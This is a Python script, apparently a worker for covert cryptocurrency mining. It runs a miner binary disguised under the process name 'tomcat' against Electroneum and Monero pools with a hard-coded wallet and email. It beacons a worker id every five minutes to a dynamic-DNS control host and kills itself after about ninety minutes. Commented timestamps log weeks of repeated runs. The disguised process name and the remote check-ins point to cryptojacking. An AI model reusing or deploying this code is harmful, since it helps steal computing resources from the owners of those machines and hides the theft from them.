import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:56:07.313010
#2018-02-17 16:45:09.928338
#2018-02-17 18:34:01.824168
#2018-02-17 20:22:01.417124
#2018-02-17 22:09:05.837283
#2018-02-17 23:54:05.193081
#2018-02-18 01:44:05.301491
#2018-02-18 03:33:03.569360
#2018-02-18 05:21:01.593369
#2018-02-18 07:12:01.734804
#2018-02-18 09:00:01.579193
#2018-02-18 10:46:07.439796
#2018-02-18 12:33:04.091033
#2018-02-18 14:20:04.801510
#2018-02-18 16:11:04.476516
#2018-02-18 17:59:06.000707
#2018-02-18 19:46:04.087838
#2018-02-18 21:33:03.421963
#2018-02-18 23:22:07.091308
#2018-02-19 01:09:05.109072
#2018-02-19 02:55:05.331263
#2018-02-19 04:42:01.779727
#2018-02-19 06:26:04.926625
#2018-02-19 08:16:06.158821
#2018-02-19 10:05:07.553240
#2018-02-19 11:54:07.634251
#2018-02-19 13:41:05.245199
#2018-02-19 15:28:07.562975
#2018-02-19 17:17:04.810386
#2018-02-19 19:05:10.649119
#2018-02-19 20:52:05.218473
#2018-02-19 22:42:05.160925
#2018-02-20 00:27:03.437465
#2018-02-20 02:14:06.816184
#2018-02-20 04:05:07.905624
#2018-02-20 05:48:05.413363
#2018-02-20 07:34:06.033645
#2018-02-20 09:19:06.537387
#2018-02-20 11:03:06.055102
#2018-02-20 12:49:09.094830
#2018-02-20 14:34:01.930405
#2018-02-20 16:20:11.193546
#2018-02-20 18:08:02.075542
#2018-02-20 20:01:04.039174
#2018-02-20 21:48:07.698775
#2018-02-20 23:29:05.868760
#2018-02-21 01:14:06.952659
#2018-02-21 03:03:04.198769
#2018-02-21 04:50:07.120842
#2018-02-21 06:36:07.447540
#2018-02-21 08:22:05.687588
#2018-02-21 10:07:07.701833
#2018-02-21 11:56:05.902672
#2018-02-21 13:46:01.669216
#2018-02-21 15:32:05.594297
#2018-02-21 17:21:06.979649
#2018-02-21 19:09:08.357634
#2018-02-21 20:56:01.475493
#2018-02-21 22:43:04.906740
#2018-02-22 00:32:01.395919
#2018-02-22 02:21:04.258773
#2018-02-22 04:07:06.483582
#2018-02-22 05:52:06.412928
#2018-02-22 07:37:05.483796
#2018-02-22 09:25:07.433497
#2018-02-22 11:13:01.809532
#2018-02-22 12:59:06.126058
#2018-02-22 14:47:07.688022
#2018-02-22 16:33:09.074202
#2018-02-22 18:18:09.685798
#2018-02-22 20:11:02.206712
#2018-02-22 21:58:09.037866
#2018-02-22 23:45:08.538132
#2018-02-23 01:34:06.634271
#2018-02-23 03:20:05.899069
#2018-02-23 05:08:03.766499
#2018-02-23 06:52:05.414483
#2018-02-23 08:41:01.778164
#2018-02-23 10:57:09.128434
#2018-02-23 12:52:08.291030
#2018-02-23 14:36:01.827709
#2018-02-23 16:27:01.554917
#2018-02-23 18:13:04.164747
#2018-02-23 20:00:02.489776
#2018-02-23 21:45:01.543539
#2018-02-23 23:40:08.501551
#2018-02-24 01:32:01.360220
#2018-02-24 03:21:02.016404
#2018-02-24 05:05:01.685094
#2018-02-24 06:53:07.632049
#2018-02-24 08:45:08.170094
#2018-02-24 11:19:02.124616
#2018-02-24 13:08:05.637349
#2018-02-24 14:58:05.121066
#2018-02-24 16:48:05.669506
#2018-02-24 18:36:06.916811
#2018-02-24 20:25:08.139650
#2018-02-24 22:21:07.126199
#2018-02-25 01:29:01.660621
#2018-02-25 05:03:01.713001
#2018-02-25 10:02:01.365970